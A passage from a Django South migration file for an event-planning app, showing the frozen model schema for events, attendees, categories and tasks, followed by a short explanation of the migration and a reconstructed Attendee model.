'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'eventPlanner.attendee': {
'Meta': {'object_name': 'Attendee'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eventPlanner.Events']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_managing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'eventPlanner.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'eventPlanner.events': {
'Meta': {'object_name': 'Events'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eventPlanner.Category']", 'null': 'True', 'blank': 'True'}),
'created_datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'default': "'DR'", 'max_length': '2'})
},
'eventPlanner.task': {
'Meta': {'object_name': 'Task'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eventPlanner.Events']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_managing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'target_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
    }

    complete_apps = ['eventPlanner']
|
[
"Stephen_Khuu@epam.com"
] |
Stephen_Khuu@epam.com
|
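This is an auto-generated South schema migration (South was Django's de facto migration tool before Django 1.7): forwards() creates the eventPlanner_attendee table and backwards() drops it, while the models dictionary is a frozen snapshot of the ORM state used to run the migration. The Django model implied by the new table would look roughly like the sketch below (a reconstruction from the frozen schema, not the project's actual models.py, which is not shown here):

from django.contrib.auth.models import User
from django.db import models

class Attendee(models.Model):
    # Mirrors the columns created in forwards(): two foreign keys plus a flag.
    # Pre-Django-1.7 style, so ForeignKey takes no on_delete argument.
    user = models.ForeignKey(User)
    event = models.ForeignKey('Events')
    is_managing = models.BooleanField(default=False)

With South installed, the migration would typically be applied with 'python manage.py migrate eventPlanner'.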